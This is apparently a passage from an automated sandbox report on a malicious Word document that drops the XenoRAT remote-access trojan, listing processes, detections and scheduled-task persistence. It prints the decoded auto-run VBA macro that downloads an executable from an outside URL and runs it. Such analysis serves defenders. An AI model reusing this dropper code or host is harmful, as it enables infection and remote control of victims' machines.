                                  2024-12-06 09:29:50 UTC16384INData Raw: 42 6c 6f 63 6b 00 50 75 74 42 79 74 65 00 47 65 74 42 79 74 65 00 53 74 61 74 65 00 49 6e 64 65 78 00 55 70 64 61 74 65 43 68 61 72 00 55 70 64 61 74 65 4d 61 74 63 68 00 55 70 64 61 74 65 52 65 70 00 55 70 64 61 74 65 53 68 6f 72 74 52 65 70 00 49 73 43 68 61 72 53 74 61 74 65 00 e2 81 aa e2 80 8e e2 81 ae e2 80 aa e2 81 af e2 81 ac e2 81 ae e2 80 8e e2 81 ab e2 81 aa e2 80 8c e2 80 8c e2 80 ab e2 80 8c e2 80 8d e2 80 ac e2 80 8b e2 81 ae e2 80 8f e2 80 ae e2 80 8b e2 81 af e2 80 8b e2 80 8f e2 81 ac e2 80 8c e2 80 8d e2 80 ac e2 80 aa e2 81 ae e2 81 ad e2 80 8f e2 80 ae e2 81 ad e2 80 8e e2 81 ac e2 81 aa e2 80 8f e2 80 ad e2 80 ae e2 80 ae 00 e2 81 ab e2 80 ab e2 81 ae e2 80 8b e2 80 8f e2 80 8e e2 81 ad e2 80 ab e2 80 ad e2 81 ab e2 81 ab e2 80 ac e2
                                  Data Ascii: BlockPutByteGetByteStateIndexUpdateCharUpdateMatchUpdateRepUpdateShortRepIsCharState


                                  Click to jump to process

                                  Click to jump to process

                                  Click to dive into process behavior distribution

                                  Click to jump to process

                                  Target ID:0
                                  Start time:04:29:43
                                  Start date:06/12/2024
                                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                  Imagebase:0x13fb70000
                                  File size:1'423'704 bytes
                                  MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:4
                                  Start time:04:29:50
                                  Start date:06/12/2024
                                  Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe"
                                  Imagebase:0xbe0000
                                  File size:169'984 bytes
                                  MD5 hash:F44302503EA4EEDFA831C25711DF51B7
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000004.00000002.375878692.0000000002011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000004.00000002.375878692.00000000020F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Antivirus matches:
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 47%, ReversingLabs
                                  Reputation:low
                                  Has exited:true

                                  Target ID:5
                                  Start time:04:29:51
                                  Start date:06/12/2024
                                  Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
                                  Imagebase:0xbe0000
                                  File size:169'984 bytes
                                  MD5 hash:F44302503EA4EEDFA831C25711DF51B7
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000005.00000002.375386923.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:true

                                  Target ID:6
                                  Start time:04:29:51
                                  Start date:06/12/2024
                                  Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
                                  Imagebase:0xbe0000
                                  File size:169'984 bytes
                                  MD5 hash:F44302503EA4EEDFA831C25711DF51B7
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:false

                                  Target ID:7
                                  Start time:04:29:51
                                  Start date:06/12/2024
                                  Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
                                  Imagebase:0xbe0000
                                  File size:169'984 bytes
                                  MD5 hash:F44302503EA4EEDFA831C25711DF51B7
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  Target ID:8
                                  Start time:04:29:52
                                  Start date:06/12/2024
                                  Path:C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe"
                                  Imagebase:0xb10000
                                  File size:169'984 bytes
                                  MD5 hash:F44302503EA4EEDFA831C25711DF51B7
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000008.00000002.380210454.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000008.00000002.380210454.0000000002500000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000008.00000002.380210454.0000000002411000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Antivirus matches:
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 47%, ReversingLabs
                                  Reputation:low
                                  Has exited:true

                                  Target ID:9
                                  Start time:04:29:52
                                  Start date:06/12/2024
                                  Path:C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe
                                  Imagebase:0xb10000
                                  File size:169'984 bytes
                                  MD5 hash:F44302503EA4EEDFA831C25711DF51B7
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  Target ID:10
                                  Start time:04:29:52
                                  Start date:06/12/2024
                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                  Wow64 process (32bit):true
                                  Commandline:"schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp6A67.tmp" /F
                                  Imagebase:0xe90000
                                  File size:179'712 bytes
                                  MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:11
                                  Start time:04:29:52
                                  Start date:06/12/2024
                                  Path:C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe
                                  Imagebase:0xb10000
                                  File size:169'984 bytes
                                  MD5 hash:F44302503EA4EEDFA831C25711DF51B7
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  Target ID:12
                                  Start time:04:29:52
                                  Start date:06/12/2024
                                  Path:C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe
                                  Imagebase:0xb10000
                                  File size:169'984 bytes
                                  MD5 hash:F44302503EA4EEDFA831C25711DF51B7
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  Target ID:16
                                  Start time:04:29:55
                                  Start date:06/12/2024
                                  Path:C:\Windows\System32\taskeng.exe
                                  Wow64 process (32bit):false
                                  Commandline:taskeng.exe {4070AE52-7E9D-44E5-8168-5CF4F89E1764} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                                  Imagebase:0xff6a0000
                                  File size:464'384 bytes
                                  MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:17
                                  Start time:04:29:55
                                  Start date:06/12/2024
                                  Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
                                  Imagebase:0xbe0000
                                  File size:169'984 bytes
                                  MD5 hash:F44302503EA4EEDFA831C25711DF51B7
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000011.00000002.393953865.0000000002135000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000011.00000002.393953865.0000000002207000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Has exited:true

                                  Target ID:18
                                  Start time:04:30:00
                                  Start date:06/12/2024
                                  Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
                                  Imagebase:0xbe0000
                                  File size:169'984 bytes
                                  MD5 hash:F44302503EA4EEDFA831C25711DF51B7
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:19
                                  Start time:04:30:00
                                  Start date:06/12/2024
                                  Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
                                  Imagebase:0xbe0000
                                  File size:169'984 bytes
                                  MD5 hash:F44302503EA4EEDFA831C25711DF51B7
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:20
                                  Start time:04:30:00
                                  Start date:06/12/2024
                                  Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
                                  Imagebase:0xbe0000
                                  File size:169'984 bytes
                                  MD5 hash:F44302503EA4EEDFA831C25711DF51B7
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Call Graph

                                  Module: NewMacros

                                  Declaration
                                  LineContent
                                  1

                                  Attribute VB_Name = "NewMacros"

                                  LineInstructionMeta Information
                                  2

                                  Sub doc()

                                  8

                                  End Sub

                                  Module: ThisDocument

                                  Declaration
                                  LineContent
                                  1

                                  Attribute VB_Name = "ThisDocument"

                                  2

                                  Attribute VB_Base = "1Normal.ThisDocument"

                                  3

                                  Attribute VB_GlobalNameSpace = False

                                  4

                                  Attribute VB_Creatable = False

                                  5

                                  Attribute VB_PredeclaredId = True

                                  6

                                  Attribute VB_Exposed = True

                                  7

                                  Attribute VB_TemplateDerived = True

                                  8

                                  Attribute VB_Customizable = True

                                  APIsMeta Information

                                  Chr

                                  CreateObject

                                  CreateObject("WScript.Shell")

                                  SpecialFolders

                                  TypeText

                                  CreateObject

                                  CreateObject("microsoft.xmlhttp")

                                  CreateObject

                                  CreateObject("Shell.Application")

                                  Part of subcall function pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd@ThisDocument: Len

                                  Part of subcall function pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd@ThisDocument: InStr

                                  Part of subcall function pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd@ThisDocument: Mid

                                  Part of subcall function pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd@ThisDocument: Mid

                                  Part of subcall function pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd@ThisDocument: Mid

                                  Open

                                  IXMLHTTPRequest.Open("get","https://www.stipamana.com/sedtryerytsrtyuerthreytwsytysrerter/zgdargaregwaerwgsergtseggs/dfghsgthwstrsrthtghtgh/brtyhdrh.exe",False)

                                  Part of subcall function pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd@ThisDocument: Len

                                  Part of subcall function pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd@ThisDocument: InStr

                                  Part of subcall function pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd@ThisDocument: Mid

                                  Part of subcall function pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd@ThisDocument: Mid

                                  Part of subcall function pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd@ThisDocument: Mid

                                  send

                                  responseBody

                                  Status

                                  IXMLHTTPRequest.Status() -> 200

                                  CreateObject

                                  CreateObject("adodb.stream")

                                  Open

                                  Stream.Open()

                                  Type

                                  Write

                                  Stream.Write(?\xfffd\x03\x00\x04\x00?\x00\xfffd\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x00????????????????4???????????$\x00\x00\x00?\x00O\x03??\x00\x00\x00\x00\xfffdAc\x0b?\x02?\x00\x00\x00?\x02 \x00?\x02\x00@ \x00?\x00\x04\x00\x00\x00\x04\x00\x00\x00?\x02?\x00\x00\x00\x02?\x00\x10?\x00\x00\x10?\x00\x00\x00\x10\x00\x00\x00\x00\x00?\x02S\x00?\x02?\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x02\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x08\x00\x00\x00\x00\x00?\x00H\x00\x00\x00\x00\x00??t\x00?\x02 \x00?\x02?\x00\x00\x00\x00\x00\x00\x00 ???c\x00?\x00?\x02?\x00?\x02\x00\x00\x00\x00\x00\x00@????\x00\x0c\x00?\x02?\x00?\x02\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00\x00\x00?\x02\x00\x00H\x00\x02\x05?\x02?\x00\x03\x00\x02?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00??????????????????????????????????????????????????????????????o????????????????????????????????????????????????????????R????????????????????????????????????????????????????E???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????j??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????Z??J????????????????????????????????????????j???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd????????????????????\xfffd?????????????????????????????????????????????\xfffd?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????U?????????????????????????g????????e??????????????????\xfffd?????????????????????|?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????j???????????????????????????????????????????????r?????%??????????????????????\x11?????????????????????????????!???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd?+????????????????????????????????????????\xfffd?\xfffd????\xfffd??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????c???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????U????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????C??????????????????\x13?????G????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????R??????????????N????L????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????]????????N???????????????????????????????????????????????????K??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????b?L?????????????????????????????????????????????r??N????????????????????????????????????????????????????5?????????????????????????????)

                                  SaveToFile

                                  Close

                                  Open

                                  IShellDispatch6.Open("C:\Users\Albus\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe")
                                  StringsDecrypted Strings
                                  "200"
                                  "WScript.Shell"
                                  "Recent"
                                  "Please wait....."
                                  "microsoft.xmlhttp"
                                  "Shell.Application"
                                  "get"
                                  "h\xd6\xd6\xd3\xd5://www.\xd5\xd6\xc4\xd3\xc0m\xc0\xc5\xc0.\xc1\xd2m/\xd5\xc2d\xd6\xd4\xdc\xc2\xd4\xdc\xd6\xd5\xd4\xd6\xdc\xd9\xc2\xd4\xd6h\xd4\xc2\xdc\xd6w\xd5\xdc\xd6\xdc\xd5\xd4\xc2\xd4\xd6\xc2\xd4/zgd\xc0\xd4g\xc0\xd4\xc2gw\xc0\xc2\xd4wg\xd5\xc2\xd4g\xd6\xd5\xc2gg\xd5/d\xc3gh\xd5g\xd6hw\xd5\xd6\xd4\xd5\xd4\xd6h\xd6gh\xd6gh/b\xd4\xd6\xdchd\xd4h.\xc2\xdb\xc2"
                                  "adodb.stream"
                                  "adodb.stream"
                                  LineInstructionMeta Information
                                  32

                                  Private Sub Document_Open()

                                  33

                                  Dim WshShell as Object

                                  executed
                                  34

                                  Dim JbiIUBSpecialPathTycyt as String

                                  35

                                  Dim kxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBw as Integer

                                  36

                                  kxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBw = Chr(50) + Chr(48) + Chr(48)

                                  Chr

                                  40

                                  Set WshShell = CreateObject("WScript.Shell")

                                  CreateObject("WScript.Shell")

                                  executed
                                  41

                                  JbiIUBSpecialPathTycyt = WshShell.SpecialFolders("Recent")

                                  SpecialFolders

                                  42

                                  Dim TsKVKHBTQoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr

                                  43

                                  Dim nbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHf

                                  44

                                  Dim dEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBTQoXiokwMNjluRzcsYfyGvb

                                  45

                                  Dim zDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBT

                                  46

                                  Dim xHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTg

                                  47

                                  Dim WWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCf as Integer

                                  48

                                  Dim lgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZ

                                  49

                                  Dim cUcGTSjmphFUNxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHP

                                  50

                                  WWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCf = 1

                                  52

                                  ECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYCh = "Please wait....."

                                  53

                                  Selection.TypeText (ECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYCh)

                                  TypeText

                                  56

                                  Set lgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZ = CreateObject("microsoft.xmlhttp")

                                  CreateObject("microsoft.xmlhttp")

                                  executed
                                  57

                                  Set xHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTg = CreateObject("Shell.Application")

                                  CreateObject("Shell.Application")

                                  executed
                                  59

                                  zDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBT = JbiIUBSpecialPathTycyt + pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd("\M\xe2\xe3\xd8\xe2F.\xc2\xdb\xc2")

                                  60

                                  lgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZ.Open "get", pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd("h\xd6\xd6\xd3\xd5://www.\xd5\xd6\xc4\xd3\xc0m\xc0\xc5\xc0.\xc1\xd2m/\xd5\xc2d\xd6\xd4\xdc\xc2\xd4\xdc\xd6\xd5\xd4\xd6\xdc\xd9\xc2\xd4\xd6h\xd4\xc2\xdc\xd6w\xd5\xdc\xd6\xdc\xd5\xd4\xc2\xd4\xd6\xc2\xd4/zgd\xc0\xd4g\xc0\xd4\xc2gw\xc0\xc2\xd4wg\xd5\xc2\xd4g\xd6\xd5\xc2gg\xd5/d\xc3gh\xd5g\xd6hw\xd5\xd6\xd4\xd5\xd4\xd6h\xd6gh\xd6gh/b\xd4\xd6\xdchd\xd4h.\xc2\xdb\xc2"), False

                                  IXMLHTTPRequest.Open("get","https://www.stipamana.com/sedtryerytsrtyuerthreytwsytysrerter/zgdargaregwaerwgsergtseggs/dfghsgthwstrsrthtghtgh/brtyhdrh.exe",False)

                                  executed
                                  61

                                  lgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZ.send

                                  send

                                  62

                                  nbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHf = lgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZ.responseBody

                                  responseBody

                                  63

                                  If lgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZ.Status = 200 Then

                                  IXMLHTTPRequest.Status() -> 200

                                  executed
                                  64

                                  Set TsKVKHBTQoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr = CreateObject("adodb.stream")

                                  CreateObject("adodb.stream")

                                  executed
                                  65

                                  TsKVKHBTQoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr.Open

                                  Stream.Open()

                                  executed
                                  66

                                  TsKVKHBTQoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr.Type = WWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCf

                                  Type

                                  67

                                  TsKVKHBTQoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr.Write nbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHf

                                  Stream.Write(?\xfffd\x03\x00\x04\x00?\x00\xfffd\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x00????????????????4???????????$\x00\x00\x00?\x00O\x03??\x00\x00\x00\x00\xfffdAc\x0b?\x02?\x00\x00\x00?\x02 \x00?\x02\x00@ \x00?\x00\x04\x00\x00\x00\x04\x00\x00\x00?\x02?\x00\x00\x00\x02?\x00\x10?\x00\x00\x10?\x00\x00\x00\x10\x00\x00\x00\x00\x00?\x02S\x00?\x02?\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x02\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x08\x00\x00\x00\x00\x00?\x00H\x00\x00\x00\x00\x00??t\x00?\x02 \x00?\x02?\x00\x00\x00\x00\x00\x00\x00 ???c\x00?\x00?\x02?\x00?\x02\x00\x00\x00\x00\x00\x00@????\x00\x0c\x00?\x02?\x00?\x02\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00\x00\x00?\x02\x00\x00H\x00\x02\x05?\x02?\x00\x03\x00\x02?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00??????????????????????????????????????????????????????????????o????????????????????????????????????????????????????????R????????????????????????????????????????????????????E???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????j??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????Z??J????????????????????????????????????????j???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd????????????????????\xfffd?????????????????????????????????????????????\xfffd?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????U?????????????????????????g????????e??????????????????\xfffd?????????????????????|?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????j???????????????????????????????????????????????r?????%??????????????????????\x11?????????????????????????????!???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd?+????????????????????????????????????????\xfffd?\xfffd????\xfffd??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????c???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????U????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????C??????????????????\x13?????G????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????R??????????????N????L????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????]????????N???????????????????????????????????????????????????K??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????b?L?????????????????????????????????????????????r??N????????????????????????????????